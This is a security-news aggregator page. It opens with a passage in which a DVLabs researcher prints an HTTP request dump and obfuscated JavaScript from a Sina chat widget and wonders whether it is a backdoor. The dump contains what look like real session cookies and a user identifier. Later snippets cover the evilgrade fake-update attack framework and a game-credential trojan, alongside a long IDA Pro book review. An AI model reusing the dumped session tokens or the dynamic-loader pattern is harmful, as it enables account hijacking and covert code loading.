00F0  6F 77 73 20 4E 54 20 35 2E 31 3B 20 51 51 44 6F  ows NT 5.1; QQDo

0100  77 6E 6C 6F 61 64 20 31 2E 37 3B 20 54 68 65 57  wnload 1.7; TheW

0110  6F 72 6C 64 29 0D 0A 48 6F 73 74 3A 20 77 6F 6F  orld)..Host: woo

0120  63 61 6C 6C 2E 67 61 6D 65 73 2E 73 69 6E 61 2E  call.games.sina.

0130  63 6F 6D 2E 63 6E 0D 0A 43 6F 6E 6E 65 63 74 69  com.cn..Connecti

0140  6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A  on: Keep-Alive..

0150  43 6F 6F 6B 69 65 3A 20 53 49 4E 41 47 4E 3D 30  Cookie: SINAGN=0

0160  7C 31 32 31 37 36 34 34 37 37 34 32 36 35 3B 20  |1217644774265; 

0170  73 69 6E 61 52 6F 74 61 74 6F 72 2F 3D 32 33 3B  sinaRotator/=23;

0180  20 53 49 4E 41 47 4C 4F 42 41 4C 3D 31 35 32 2E   SINAGLOBAL=152.

0190  32 33 2E 36 31 2E 31 36 33 2E 33 32 31 30 32 31  23.61.163.321021

01A0  32 31 33 37 36 36 32 39 38 33 31 31 3B 20 76 6A  213766298311; vj

01B0  75 69 64 73 3D 35 62 31 34 66 39 38 33 39 2E 31  uids=5b14f9839.1

01C0  31 62 38 30 34 32 61 37 39 66 2E 30 2E 31 62 30  1b8042a79f.0.1b0

01D0  62 64 61 62 61 32 66 33 66 66 63 3B 20 76 6A 6C  bdaba2f3ffc; vjl

01E0  61 73 74 3D 31 32 31 37 36 34 34 37 37 38 3B 20  ast=1217644778; 

01F0  41 70 61 63 68 65 3D 31 35 32 2E 32 33 2E 36 31  Apache=152.23.61

0200  2E 31 36 33 2E 38 36 38 36 31 32 31 37 36 33 30  .163.86861217630

0210  32 33 33 36 37 32 3B 20 53 45 3D 39 43 41 41 36  233672; SE=9CAA6

0220  46 34 33 35 34 30 37 41 42 31 36 32 44 44 37 38  F435407AB162DD78

0230  45 43 37 42 43 45 45 32 37 33 46 37 36 37 37 42  EC7BCEE273F7677B

0240  36 36 44 30 30 35 34 36 36 41 35 41 42 41 32 39  66D005466A5ABA29

0250  39 31 30 42 33 44 34 42 30 35 44 42 32 43 45 33  910B3D4B05DB2CE3

0260  30 46 35 30 37 39 41 44 42 32 34 38 30 30 39 45  0F5079ADB248009E

0270  43 39 43 32 35 30 32 45 33 32 34 46 41 36 46 39  C9C2502E324FA6F9

0280  43 30 34 30 37 42 41 44 34 39 44 32 39 36 46 32  C0407BAD49D296F2

0290  38 39 43 30 36 38 32 42 35 37 38 30 44 42 35 39  89C0682B5780DB59

02A0  43 45 37 45 33 44 43 37 34 30 30 37 33 36 46 35  CE7E3DC7400736F5

02B0  35 45 41 33 37 36 33 31 38 36 34 3B 20 53 43 54  5EA37631864; SCT

02C0  3D 31 31 3B 20 53 41 3D 30 25 37 43 30 25 37 43  =11; SA=0%7C0%7C

02D0  30 25 37 43 30 25 37 43 31 25 37 43 31 25 37 43  0%7C0%7C1%7C1%7C

02E0  31 25 37 43 31 25 37 43 30 25 37 43 31 25 37 43  1%7C1%7C0%7C1%7C

02F0  30 25 37 43 30 25 37 43 31 25 37 43 30 25 37 43  0%7C0%7C1%7C0%7C

0300  30 25 37 43 30 25 37 43 31 25 37 43 30 25 37 43  0%7C0%7C1%7C0%7C

0310  30 25 37 43 30 25 37 43 30 25 37 43 30 25 37 43  0%7C0%7C0%7C0%7C

0320  30 25 37 43 30 25 37 43 30 25 37 43 30 3B 20 50  0%7C0%7C0%7C0; P

0330  53 3D 30 3B 20 53 55 3D 25 45 35 25 41 44 25 39  S=0; SU=%E5%AD%9

0340  39 25 45 39 25 39 44 25 39 36 25 45 34 25 42 38  9%E9%9D%96%E4%B8

0350  25 42 30 3A 32 3A 31 32 37 36 38 33 35 38 32 37  %B0:2:1276835827

0360  3A 66 68 66 79 75 3A 31 32 31 37 36 33 30 32 38  :fhfyu:121763028

0370  34 3A 31 3A 31 39 32 32 2D 30 35 2D 32 36 3A 3B  4:1:1922-05-26:;

0380  20 53 49 4E 41 50 52 4F 3D 66 71 32 6D 66 4D 38   SINAPRO=fq2mfM8

0390  4D 44 25 33 44 37 57 6D 44 78 46 25 32 35 37 25  MD%3D7WmDxF%257%

03A0  32 35 25 32 35 78 32 39 57 39 77 37 25 33 44 52  25%25x29W9w7%3DR

03B0  32 4A 25 32 35 65 78 79 37 4A 25 33 44 32 4D 69  2J%25exy7J%3D2Mi

03C0  52 25 32 36 6C 7A 4D 37 32 77 25 33 44 25 32 35  R%26lzM72w%3D%25

03D0  39 4A 25 32 31 37 6D 77 25 32 35 39 25 32 36 25  9J%217mw%259%26%

03E0  32 36 4D 6D 4A 4D 25 32 31 77 3B 20 55 4E 49 50  26MmJM%21w; UNIP

03F0  52 4F 55 3D 32 3A 25 43 42 25 45 46 25 42 45 25  ROU=2:%CB%EF%BE%

0400  42 38 25 42 37 25 45 31 3A 30 3A 3A 31 3A 3B 20  B8%B7%E1:0::1:; 

0410  6E 69 63 6B 3D 66 68 66 79 75 28 31 32 37 36 38  nick=fhfyu(12768

0420  33 35 38 32 37 29 3B 20 61 70 70 6D 61 73 6B 3D  35827); appmask=

0430  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  00000000

0440  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34  00000004

0450  3B 20 67 65 6E 64 65 72 3D 31 3B 20 53 49 4E 41  ; gender=1; SINA

0460  2D 41 56 41 54 41 52 3D 30 25 37 43 30 25 37 43  -AVATAR=0%7C0%7C

0470  30 25 37 43 30 25 37 43 31 25 37 43 31 25 37 43  0%7C0%7C1%7C1%7C

0480  31 25 37 43 31 25 37 43 30 25 37 43 31 25 37 43  1%7C1%7C0%7C1%7C

0490  30 25 37 43 30 25 37 43 31 25 37 43 30 25 37 43  0%7C0%7C1%7C0%7C

04A0  30 25 37 43 30 25 37 43 31 25 37 43 30 25 37 43  0%7C0%7C1%7C0%7C

04B0  30 25 37 43 30 25 37 43 30 25 37 43 30 25 37 43  0%7C0%7C0%7C0%7C

04C0  30 25 37 43 30 25 37 43 30 25 37 43 30 3B 20 53  0%7C0%7C0%7C0; S

04D0  49 4E 41 50 52 4F 43 3D 31 3B 20 55 4E 49 50 52  INAPROC=1; UNIPR

04E0  4F 54 4D 3D 31 32 31 37 36 33 30 32 38 34 3B 20  OTM=1217630284; 

04F0  53 49 4E 41 5F 4E 55 3D 3B 20 53 49 4E 41 5F 4F  SINA_NU=; SINA_O

0500  55 3D 3B 20 53 49 4E 41 5F 55 53 45 52 3D 3B 20  U=; SINA_USER=; 

0510  53 4D 53 5F 43 4F 4F 4B 49 45 3D 3B 20 53 49 44  SMS_COOKIE=; SID

0520  3D 3B 20 55 4E 49 50 52 4F 4D 3D 3B 20 67 5F 78  =; UNIPROM=; g_x

0530  5F 64 5F 6A 5F 73 3D 37 64 38 7C 37 7C 31 3B 20  _d_j_s=7d8|7|1; 

0540  73 69 6E 61 52 6F 74 61 74 6F 72 2F 3D 32 33 0D  sinaRotator/=23.

0550  0A 0D 0A                                           ...

This seemed strange, so I pulled down the source from the above cgi-bin and found this:

function Bgfhp(){var S_WC_EMBED_CORE=function(){this.Init.apply(this,arg

uments);};S_WC_EMBED_CORE.prototype={bY:false,Init:function(bY,cl){this.

cl=cl;this.bY=bY;this.bX=this.Z();if(this.bX){this.ag();}else S_WC_EMBED

_CORE=null;},Z:function(){var aC=/http:\/\/([A-Za-z0-9\-\.]+)(.sina.com.

cn)\//ig;var ci=document.location.href;var bo=ci.indexOf('?');if(bo!=-1)

ci=ci.substr(0,bo);var bp=ci.indexOf('#');if(bp!=-1)ci=ci.substr(0,bp);

if(!aC.test(ci)){return false;}return true;},ag:function(){var ak=new

Util.aO;this.bY=ak.am(this.bY,this.cl.P,true);window.document.woocall_

swf_file.SetVariable("Probe",this.bY);}}; var WCEmbedCore = new S_WC_EMB

ED_CORE('999e69a3b8e9231ea48de6f141d1d3c7fdd567a5',S_WC.EmbedConf);}

Bgfhp();

This looks more like bad programming than anything, so I decided to check out the HTTP Referer, and I was directed to a a Flash application:

a Backdoor perhaps? Let's look at the source code that creates this little gem:

<!--[442,2,9] published at 2007-08-13 11:19:29 from #237 by 1786-->

if(typeof Util=='undefined')Util={};Util.aO=function()

{this.Init.apply(this,arguments);};Util.aO.prototype={Init:function

(){},au:function(v,w){var bs=v.length;var aK=v[bs-1]&0xffffffff;for

(var i=0;i<bs;i++){v[i]=String.fromCharCode(v[i]&0xff,v[i]

>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}if(w){return v.join

('').substring(0,aK);}else{return v.join('');}},bq:function(s,w){var

 ce=s.length;var v=[];for(var i=0;i<ce;i+=4){v[i>>2]=s.charCodeAt

(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)

<<24;}if(w){v[v.length]=ce;}return v;},am:function(cg,at,as){if

(cg==""){return "";}if(as)cg=this.aq(cg);var v=this.bq(cg,false);var

 k=this.bq(at,false);var n=v.length-1;var z=v[n-1],y=v

[0],bh=0x9E3779B9;var bU,e,q=Math.floor(6+52/

(n+1)),cc=q*bh&0xffffffff;while(cc!=0){e=cc>>>2&3;for(var p=n;p>0;p

--){z=v[p-1];bU=(z>>>5^y<<2)+(y>>>3^z<<4)^(cc^y)+(k[p&3^e]^z);y=v

[p]=v[p]-bU&0xffffffff;}z=v[n];bU=(z>>>5^y<<2)+(y>>>3^z<<4)^(cc^y)+

(k[p&3^e]^z);y=v[0]=v[0]-bU&0xffffffff;cc=cc-bh&0xffffffff;}return 

this.au(v,true);},aq:function(h){var r="";for(var i=(h.substr(0,2)

=="0x")?2:0;i<h.length;i+=2)r+=String.fromCharCode(parseInt

(h.substr(i,2),16));return r;}};if(typeof Util=='undefined')Util=

{};Util.by=function(){this.Init.apply

(this,arguments);};Util.by.prototype={ar:0,o:"",cb:8,Init:function

(){},bi:function(s){return this.ah(this.aj(this.aL

(s),s.length*this.cb));},aj:function(x,ce){x[ce>>5]|=0x80<<(24-ce%

32);x[((ce+64>>9)<<4)+15]=ce;var w=Array(80);var a=1732584193;var 

b=-271733879;var c=-1732584194;var d=271733878;var e=-

1009589776;for(var i=0;i<x.length;i+=16){var ax=a;var ay=b;var 

az=c;var aA=d;var aB=e;for(var j=0;j<80;j++){if(j<16)w[j]=x

[i+j];else w[j]=this.bH(w[j-3]^w[j-8]^w[j-14]^w[j-16],1);var 

t=this.cf(this.cf(this.bH(a,5),this.aI(j,b,c,d)),this.cf(this.cf

(e,w[j]),this.aJ(j)));e=d;d=c;c=this.bH(b,30);b=a;a=t;}a=this.cf

(a,ax);b=this.cf(b,ay);c=this.cf(c,az);d=this.cf(d,aA);e=this.cf

(e,aB);}return Array(a,b,c,d,e);},aI:function(t,b,c,d){if(t<20)

return(b&c)|((~b)&d);if(t<40)return b^c^d;if(t<60)return(b&c)|(b&d)

|(c&d);return b^c^d;},aJ:function(t){return(t<20)?1518500249:

(t<40)?1859775393:(t<60)?-1894007588:-899497514;},cf:function(x,y)

{var bl=(x&0xFFFF)+(y&0xFFFF);var aw=(x>>16)+(y>>16)+

(bl>>16);return(aw<<16)|(bl&0xFFFF);},bH:function(bm,bg){return

(bm<<bg)|(bm>>>(32-bg));},aL:function(cg){var aX=Array();var av=

(1<<this.cb)-1;for(var i=0;i<cg.length*this.cb;i+=this.cb)aX[i>>5]

|=(cg.charCodeAt(i/this.cb)&av)<<(32-this.cb-i%32);return 

aX;},ah:function(bD){var 

bj=this.ar?"0123456789ABCDEF":"0123456789abcdef";var cg="";for(var 

i=0;i<bD.length*4;i++){cg+=bj.charAt((bD[i>>2]>>((3-i%4)*8+4))&0xF)

+bj.charAt((bD[i>>2]>>((3-i%4)*8))&0xF);}return cg;}};if(typeof 

S_WC=='undefined')S_WC={};if(typeof $=='undefined')$=function(id)

{return document.getElementById(id)};if(typeof $C=='undefined')

$C=function(t){return document.createElement(t)};if(typeof 

$S=='undefined')$S={};S_WC.EmbedConf={bA:false,cj:

{bZ:'sml_emb_testing',bP:'http://image2.sina.com.cn/woocall/cli/',aS

:'.swf',bz:'woocall_swf_file',bK:'S_WC_EMBED_BOX',bL:400,bJ:300,l:10

,g:true},cd:false,T:'_SP',I:false,D:'_CL',aU:'http://image2.sina.com

.cn/ent/woocall/Theme/',K:36,A:14,f:'_CtrlBtn',C:'_ChatBox',bx:'S_WC

',aQ:14,aW:'_USRTOK',S:6,aV:0,P:'9icn4po62xa2nbcd',bv:0,F:'/cgi-

bin/s_wc_corev3?v=m&t=1'};if(typeof Util=='undefined')Util=

{};Util.bk=(navigator.appName.indexOf("Microsoft",0)!=-1)?

true:false;Util.aD=function(aM,an){var 

bd="ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";var 

bf=bd+"0123456789";var bG='';for(var i=0;i<aM;i++){var 

bW=Math.floor(Math.random()*bf.length);if(an&&i==0)bG+=bd.substring

(bW,bW+1);else bG+=bf.substring(bW,bW+1);}return 

bG;};Util.aG=function(name,value,expires,bn,domain,aE){var 

al=name+"="+escape(value)+((expires)?"; 

expires="+expires.toGMTString():"")+((bn)?"; bn="+bn:"")+

((domain)?"; domain="+domain:"")+((aE)?"; 

aE":"");document.cookie=al;};Util.ao=function(name){var 

bT=document.cookie;var prefix=name+"=";var ca=bT.indexOf("; 

"+prefix);if(ca==-1){ca=bT.indexOf(prefix);if(ca!=0)return null;}

else ca+=2;var bE=document.cookie.indexOf(";",ca);if(bE==-1)

bE=bT.length;return unescape(bT.substring

(ca+prefix.length,bE));};function LdCfg(bu){if(typeof 

SINA_WOOCALL_CONFIG!='undefined'){if

(SINA_WOOCALL_CONFIG.StandPoint&&SINA_WOOCALL_CONFIG.StandPoint.L&&S

INA_WOOCALL_CONFIG.StandPoint.R){bu.cd=

{L:SINA_WOOCALL_CONFIG.StandPoint.L,M:SINA_WOOCALL_CONFIG.StandPoint

.M?SINA_WOOCALL_CONFIG.StandPoint.M:false,R:SINA_WOOCALL_CONFIG.StandPo

int.R}}if(SINA_WOOCALL_CONFIG.CustomURL)

{bu.aP=SINA_WOOCALL_CONFIG.CustomURL;}if(SINA_WOOCALL_CONFIG.Conn)

{bu.bv=1;}}};function LdBoxCfg(){if(typeof SINA_WOOCALL_CONFIG!

='undefined'){if

(SINA_WOOCALL_CONFIG.EmbedBox&&SINA_WOOCALL_CONFIG.EmbedBox.MyId&&SI

NA_WOOCALL_CONFIG.EmbedBox.MyWidth&&SINA_WOOCALL_CONFIG.EmbedBox.MyH

eight){var B=

{N:SINA_WOOCALL_CONFIG.EmbedBox.MyId,V:SINA_WOOCALL_CONFIG.EmbedBox.

MyWidth,J:SINA_WOOCALL_CONFIG.EmbedBox.MyHeight};return B}else 

return false;}return false;};function woocall_swf_file_DoFSCommand

(ai,bC){switch(ai){case 'InitApp':S_WC.EmbedUI.Q(bC);break;}};if

(Util.bk){document.write('<SCRIPT event=FSCommand(ai,bC) 

for='+S_WC.EmbedConf.cj.bz+'>');document.write

('woocall_swf_file_DoFSCommand(ai, bC);');document.write

('</SCRIPT>');}S_WC.EmbedUI=function(){this.Init.apply

(this,arguments);};S_WC.EmbedUI.Q=function(bC){var s=$C

('script');s.src='http://'+bC+S_WC.EmbedConf.F;s.type='text/javascri

pt';document.body.appendChild(s);};S_WC.EmbedUI.prototype=

{cl:null,df:null,bR:null,aZ:null,ba:true,Init:function(cl)

{this.cl=cl;if(this.cl.bA)

this.cl.cj.bP=this.cl.cj.bP+this.cl.bA+'/';this.bX=true;this.aZ=this

.cl.bx;this.df=this.ac();this.ba=Util.bk;},H:function(){this.bb

();this.ae();this.af();},aF:function(bK,bL,bJ)

{this.cl.cj.bK=bK;this.cl.cj.bL=bL;this.cl.cj.bJ=bJ;},aH:function

(n,be){if(typeof be=='string'){this.cl.aU=be;}var 

ci=this.cl.aU+n+'/';this.cl.aT=

{U:ci+'boxlogo.gif',G:ci+"wc_style_embed.css"};},ap:function(){if(!

this.bR||this.bR.length==0){this.bb();}return this.bR;},af:function

(){var width=this.cl.cj.bL;var 

height=this.cl.cj.bJ;this.Y.style.width=width+'px';this.W.style.widt

h=width+'px';this.aY.style.height=(height-this.cl.K-this.cl.A)

+"px";this.aY.style.width=width+'px';this.X.style.width=width+'px';}

,ae:function(){this.aa();var cj=$C('div');var bN=$C('div');var m=$C

('div');var bw=$C('div');var bt=$C

('div');$(this.cl.cj.bK).appendChild

(cj);cj.className=this.aZ+this.cl.C;cj.appendChild

(bN);cj.appendChild(bw);cj.appendChild(bt);bN.className='Hnd';var 

bO=document.title;if(bO.length>this.cl.aQ){bO=bO.substr

(0,this.cl.aQ)+'..';}var O='<img align="absmiddle" 

src="'+this.cl.aT.U+'" /> '+bO;var aN='<div 

class="Title">'+O+'</div>';bN.innerHTML=aN;bt.className='Bottom';bw.

innerHTML=this.ap

();this.X=cj;this.Y=bN;this.aY=bw;this.W=bt;},aa:function(){bV=$C

("link");bV.rel="stylesheet";bV.type="text/css";bV.href=this.cl.aT.G

;var head=document.getElementsByTagName("head")[0];head.appendChild

(bV);},ac:function(){var bM='';if(this.cl.df&&this.bX)

{bM=this.cl.df;}else if(this.cl.aP&&this.bX){var bI=new 

Util.by;bM=bI.bi

(this.cl.aP);this.eF=window.location.href;this.eF=this.eF.replace

("&","|");}else

{this.eF=window.location.href;this.eF=this.eF.replace("&","|");if

(this.cl.aV>0){this.eF=this.eF.substr(0,this.cl.aV);}var bI=new 

Util.by;bM=bI.bi(this.eF);}return bM;},ad:function(){var 

ci=window.location.href;var p=ci.indexOf('/',7);var domain='';if(p!

=-1){domain=ci.substr(0,p);}else domain=ci;return 

domain;},ab:function(){var bF=new Date();bF.setTime(bF.getTime()

+365*24*60*60*1000*50);var bQ=Util.ao(this.cl.bx+this.cl.aW);if(!

bQ){bQ=Util.aD(this.cl.S,true);Util.aG

(this.cl.bx+this.cl.aW,bQ,bF,'/');}return bQ;},bc:function(ck){if

(this.cl.cd&&this.bX){ck.push('&position1=');ck.push

(this.cl.cd.L);if(this.cl.cd.M){ck.push('&position=');ck.push

(this.cl.cd.M);}ck.push('&position0=');ck.push

(this.cl.cd.R);}},bb:function(){var ef=this.ab();var ck=Array();var

 domain=this.ad();if(this.cl.cd)

{this.cl.cj.bZ=this.cl.cj.bZ+this.cl.T;}if(this.cl.I)

{this.cl.cj.bZ=this.cl.cj.bZ+this.cl.D;}if(this.ba){ck.push('<object 

classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" 

codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/

swflash.cab#version=7,0,0,0" width="');ck.push("100%");ck.push('"

 height="');ck.push("100%");ck.push('" id="');ck.push

(this.cl.cj.bz);ck.push('" align="middle"><param 

name="allowScriptAccess" value="always" />');ck.push('<param 

name="movie" value="');ck.push

(this.cl.cj.bP+this.cl.cj.bZ+this.cl.cj.aS);ck.push('?

ChName=');ck.push(this.df);ck.push('&UsrTok=');ck.push(ef);ck.push

('&Domain=');ck.push(domain);ck.push('&PgURL=');ck.push(escape

(this.eF));ck.push('&isDirect=');ck.push(this.cl.bv);this.bc

(ck);ck.push('" />');ck.push('<param name="quality" value="high" 

/><param name="bgcolor" value="#ffffff" />');ck.push('</object>');}

else{ck.push('<embed src="');ck.push

(this.cl.cj.bP+this.cl.cj.bZ+this.cl.cj.aS);ck.push('" 

FlashVars="');ck.push('ChName=');ck.push(this.df);ck.push

('&UsrTok=');ck.push(ef);ck.push('&Domain=');ck.push(domain);ck.

push('&PgURL=');ck.push(escape(this.eF));ck.push

('&isDirect=');ck.push(this.cl.bv);this.bc(ck);ck.push('" 

quality="high" bgcolor="#ffffff" width="');ck.push("100%");ck.push

('" height="');ck.push("100%");ck.push('" name="');ck.push

(this.cl.cj.bz);ck.push('" align="middle" allowScriptAccess="always"

 swLiveConnect="true" type="application/x-shockwave-flash" 

pluginspage="http://www.macromedia.com/go/getflashplayer" />');}

this.bR=ck.join('');}};function S_WC_EMBED_Creese()

{S_WC.EmbedConf.bA='0_2_REV3';LdCfg(S_WC.EmbedConf);var bB=new 

S_WC.EmbedUI(S_WC.EmbedConf);bB.aH('Grey2');var bS=LdBoxCfg();if

(bS){bB.aF(bS.N,bS.V,bS.J);bB.H();}};S_WC_EMBED_Creese(); 

Lots of interesting tricks going on here. This software seems to be a P2P chat program that allows you to chat with people that are currently viewing the same web page as you are. I found it used on the Super Girl TV show website. Seems rather innocent, but until you understand exactly what the above code does, would you use it? Is it merely obfuscation? These are the types of questions that filter writers at DVLabs have to answer on a case-by-case basis, and questions that I'll be spending some time on for the above example. So, back to work!

---

Cross-site hacks and the art of self defence - WebApp - CGISecurity.com

---

A British Bank Bans a Man's Password - Blogs - Schneier On Security

Weird story. Mr Jetley said he first realised his security password had been changed when a call centre staff member told him his code word did not match with the one on the computer. "I thought it was actually quite a funny response," he said. "But what really incensed me was when I was told I could not change it...

---

Redhat/Fedora Servers compromised, package signing key stolen, rogue packages possibly signed - WebApp - CGISecurity.com

---

Whitepaper: Bypassing ASP .NET "ValidateRequest" for Script Injection Attacks - WebApp - CGISecurity.com

---

Border Gateway Protocol (BGP) Attacks - Blogs - Schneier On Security

This is serious stuff. (Kim Zetter's posts on the topic are excellent; read them.) It's a man-in-the-middle attack. "The Internet's Biggest Security Hole" (the title of that first link) has been that interior relays have always been trusted even though they are not trustworthy....

---

ISR-evilgrade - Inject Updates to Exploit Software - Blogs - Darknet

ISR-evilgrade is a modular framework that allow us to take advantage of poor upgrade implementations by injecting fake updates and exploiting the system or software. How does it work? It works with modules, each module implements the structure needed to emulate a false update of specific applications/systems. Evilgrade needs the manipulation of...

Read the full post at darknet.org.uk

---

August 28, 2008

MindshaRE: The IDA Pro Book - Research - DVLabs

Posted by Cody Pierce
IDA can be a very intimidating program to use. When starting out, not only are you trying to get comfortable with assembly, but you also must navigate a program with a steep learning curve. IDA's lack of documentation, aside from ida.hlp, compounds this problem leaving you somewhat insecure in your endeavor. Not anymore. A new book as been published by no starch press titled "The IDA Pro Book". Its author, Chris Eagle, is no stranger to the world of reverse engineering and has been a fixture at security conferences for several years. So today we will take a look at this book. If you are strapped for time, and cannot read everything I have to say, I'll summarize this post. Buy this book!

MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history.



The IDA Pro Book is not the only book on IDA. In fact, another book on using IDA, was released earlier this year. I have looked at both of them, and honestly, there is only one book on IDA Pro. Chris Eagle funnels his knowledge of IDA and reversing into a concise, easily readable, and handy "missing manual" for IDA Pro users old and new. His chapters are well defined, and examples are elaborately detailed. Chris' time as an educator in the field of computer science, security, and reverse engineering really show throughout this book.

Part I of the book starts off by giving the reader a good baseline of tools and idioms as they pertain to reverse engineering. In the first chapter Eagle covers the "Whats, Whys, and Hows" providing a good understanding of what exactly IDA is /doing/ when disassembling a binary. Of particular interest, is the section covering different methods of disassembling a binary such as linear sweep, and recursive descent. It's important to have this understand of the method IDA employs to identify code, data, and primitives.

Chapter two, is necessary for any reverse engineering book, covering commonly used tools outside of IDA Pro. While I understand that mentioning tools such as objdump, strings, PeID, etc are necessary, this chapter is my least favorite. It seems inserted merely for posterity's sake, which isn't a terrible thing.

The last chapter rounds out a good intro, by providing the reader with an understanding of the program. It may seem obvious, but issues such as purchasing, support, and installation are at your fingertips. One paragraph titled "Hex-Rays Stance on Piracy" made me chuckle a bit. Regular IDA users will be familiar with the lengths Hex-Rays has gone to not only protect their product, but publicly decry users of pirated copies in their "Hall of Shame".

From the beginning the reader is exposed to my favorite aspect of this book. It is almost 100% IDA from cover to cover. Other books on IDA cover useful, but misguided, topics such as executable file formats, or assembly and higher level programming languages. Obviously this is required knowledge, but there are plenty of dedicated books in each of these areas. From the gates The IDA Pro Book is non stop IDA, only touching on the aforementioned topics when needed to explain a particular subject. It feels like you are really immersed in the program, learning all of its nuances.

Part II of the book jumps right into the meat and potatoes. Chris gets you started by covering the loading of files, how IDA stores its disassembly, navigation, manipulation, and data types. At over 150 pages this section should be studied and memorized by anyone who uses IDA on a regular bases.

Chapters 4 through 6 get the reader's feet wet in the program's UI. The UI is, in my opinion, the source of frustration for most new users of IDA. Eagle himself states in Chapter 3 "IDA is not your mother's word processor" because, while it may look like a text processor, the UI is in a world of its own.

Of particular interest in these chapters are the sections covering IDA's database creation, common and tertiary windows in the UI, and disassembly navigation. It's nice to see all of the UI elements available to the user described in detail in these chapters. Many of the essential windows aren't as noticeable in IDA at first glance and this provides a good reference when ida.hlp is lacking.

Chapters 7 through 10 round out this essential section of the book. One of the highlights, and must reads, is Chris' 40 page coverage of data types and structures. Everything from creating structures, to how C++ classes look in assembly, is laid out in an easy to understand, example driven, manner that is a delightful read. This could be the premier set of chapters of its kind, and certainly one of the best in the book.

Part III takes us through some of the advanced features IDA provides. Configuration customization, and IDA's FLIRT signatures are covered followed by some of IDA's limitations (Generating EXEs anyone?).

Part IV of the book really shines. Its goal is to familiarize the reader with extending IDA. Of all things IDA can do, I believe its scripting, plugin architecture, loader, and processor modules are what separate it from other disassemblers and truly make it the industry standard.

Chris Eagle has a lot of experience in this field having written many plugins, scripts, and processor modules. This is apparent throughout this part of the book and really helps when covering these complex, and almost undocumented aspects of IDA. While IDA's scripting language and SDK are not perfect, with the knowledge and help this sections provides, a user can apply this to achieve an endless amount of tasks.

While certainly useful, this advanced section may not be for everyone. If you are wanting to just disassemble binaries, and navigate code, you can skip "Extending IDA's Capabilities". But for users wanting to load exotic executable formats, or write a processor module to disassemble a virtual machine this section will be a good resource. I personally got a lot of use out of the loader and processor module chapters. The example driven teaching of these subjects is a welcome detour from the dry documentation, or sparse text files on the web.

Towards the end of the book, in Part V, Chris Eagle shows us how the previous subjects are applied in the real world. Each chapter lightly touches on its respected subject (There are whole books on vulnerability analysis) and provides a good jumping off point for readers interested in that particular application of reverse engineering in IDA Pro. Once again this book stays focused on IDA, and doesn't distract the reader. Although there may be plenty of information on subjects such as vulnerability analysis, and obfuscated code analysis, "Real World Applications" still provides value by delivering useful scripts, and information that can be leverage by IDA.

Finally we end things with the often maligned subject of IDA's built in debugger. Honestly it gets a bad rap, and it may be a deserved one when compared to fully functional debuggers like WinDbg. However the debugger is not IDA's primary function. It is another extension of the program allowing the user to take their static disassembly work into the world of live analysis.

Eagle does a fine job demonstrating the usefulness of the built in debugger and the features it exposes. From scripting breakpoints, and pulling registers, to handling exceptions its all here. Honestly, I may force myself to use it the next time I need a debugger and I'm feeling adventurous.

Chris Eagle delivers a very concise, well laid out book in "The IDA Pro Book". The step by step examples, and much needed detail of all aspects of IDA alone make this book a good choice.  Combine that with the little things such as the numbering system in the examples, must have plugins and tools, side bar tidbits of related information, and well formulated descriptions of seemingly awkward tasks, make this book a solid addition to any tech library. I honestly think, like IDA, it will be the industry standard on one of the more intimidating applications in the security, and reverse engineering world.

I know what you may be thinking, "Who is Cody, and why should I care about his wordy review?". To answer that I will leave you with two other opinions of the book.

"I wholeheartedly recommend The IDA Pro Book to all IDA Pro users" - Ilfak Guilfanov
"This is the densest, most accurate, and, by far, the best IDA Pro book ever released" - Pierre Vandevenne

For those that don't know Ilfak is the creator of IDA Pro, and Pierre is the Owner/CEO of DataRescue (Former publishers of IDA). If that's not enough, here is a blog post from Ilfak himself.

http://hexblog.com/2008/08/the_ida_pro_book.html

Hope you enjoyed this weeks MindshaRE!

-Cody

---

Chinese hacker malware infects International Space Station? - Blogs - The Dark Visitor

Breaking news is that the International Space Station has been infected by the W32.Gammima.AG trojan. The trojan is also referred to as the kavo.exe virus and is designed to gather information on ten online games:

ZhengTu
Wanmi Shijie or Perfect World
Dekaron Siwan Mojie
HuangYi Online
Rexue Jianghu
ROHAN
Seal Online
Maple Story
R2 (Reign of Revolution)
Talesweaver

Not familiar with all the games but most are Chinese or Korean. Chinese hackers specialize in stealing online gaming information. Symantec also offers up this bit in its writeup:

The worm ends the Matrix Password process if it finds a dialog box with the following characteristics:
Title: MatrixPasswordDlg
Message: Warning! (In Chinese characters)

Will check more into the origin of this malware later today but all indicators suggest that it could be Chinese.

---

Webcam Hacker Jailed for 4 Years for Spying on Teenager - Blogs - Darknet

Another one bites the dust, this time for spying on a teenage girl via webcam. 4 years is a reasonable sentence this time I think as the case borders on many offenses such as blackmail, indecent behaviour, infringement of privacy, unlawful access and probably a few more. It was a pretty simple hack as it goes, [...]

Read the full post at darknet.org.uk

---

Blue Box #82: Asterisk & Skype security vulnerabilities, new VoIP security tools, VoIP steganography, VoIP security news and much, much more... - Podcasts - Blue Box